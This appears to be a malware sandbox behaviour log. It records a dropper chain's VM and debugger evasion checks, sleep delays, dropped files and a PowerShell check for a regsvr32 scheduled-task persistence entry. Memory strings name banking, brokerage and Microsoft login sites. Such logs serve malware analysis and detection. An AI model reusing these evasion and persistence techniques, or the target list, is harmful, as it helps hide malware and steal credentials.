Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Code function: 4_2_051B0CB9 rdtsc 4_2_051B0CB9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1330
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1219
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 420
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1346
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1345
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1046
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1005
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-DFNTB.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-56BQJ.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-4B81S.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-5TPVM.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-GPTU0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-H4609.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-IPK0L.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-3OCBE.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-0867F.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-SE3IR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-UO9UR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-DIKDD.tmp Jump to dropped file
Source: C:\Users\user\Desktop\p199AjsEFs.exe TID: 4508 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe TID: 1280 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3744 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3784 Thread sleep count: 1330 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3784 Thread sleep time: -2661330s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6292 Thread sleep count: 1219 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6292 Thread sleep time: -2439219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092 Thread sleep count: 420 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092 Thread sleep time: -12600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4052 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6840 Thread sleep count: 1346 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6840 Thread sleep time: -2693346s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6408 Thread sleep count: 1345 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6408 Thread sleep time: -2691345s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 508 Thread sleep count: 1046 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 508 Thread sleep time: -2093046s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1464 Thread sleep count: 1005 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1464 Thread sleep time: -2011005s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe TID: 2156 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\Desktop\p199AjsEFs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: skotes.exe, skotes.exe, 00000009.00000002.3409322231.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe, 00000004.00000003.2429279473.000000000138F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2182666348.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2259799476.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2449611202.0000000001495000.00000004.00000020.00020000.00000000.sdmp, HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2449611202.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.3415843852.000000000122A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.3415843852.00000000011F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.0000000005640000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2449611202.00000000014C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>%8M
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 264662bead.tmp, 00000010.00000002.3396142193.00000000008F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2449611202.000000000144E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 264662bead.tmp, 00000010.00000002.3396142193.00000000008F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2438824710.00000000006F8000.00000040.00000001.01000000.00000006.sdmp, 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe, 00000004.00000002.2464400056.0000000000CA7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2507175877.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2519950574.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000002.3409322231.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\p199AjsEFs.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\p199AjsEFs.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Code function: 4_2_051B0DE2 Start: 051B0DF5 End: 051B0DFB 4_2_051B0DE2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Code function: 4_2_051B0CB9 rdtsc 4_2_051B0CB9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_0021652B mov eax, dword ptr fs:[00000030h] 9_2_0021652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_0021A302 mov eax, dword ptr fs:[00000030h] 9_2_0021A302
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: HT94GNC6NP3AGR6EM8I9D3647.exe PID: 6316, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe "C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe "C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" /VERYSILENT
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: skotes.exe, skotes.exe, 00000009.00000002.3409322231.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: (EVUProgram Manager
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe, 00000004.00000002.2464400056.0000000000CA7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2507175877.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2519950574.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: o(EVUProgram Manager
Source: HT94GNC6NP3AGR6EM8I9D3647.exe, HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2438824710.00000000006F8000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: @Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001FD3E2 cpuid 9_2_001FD3E2
Source: C:\Users\user\Desktop\p199AjsEFs.exe Queries volume information: C:\ VolumeInformation Jump to behavior
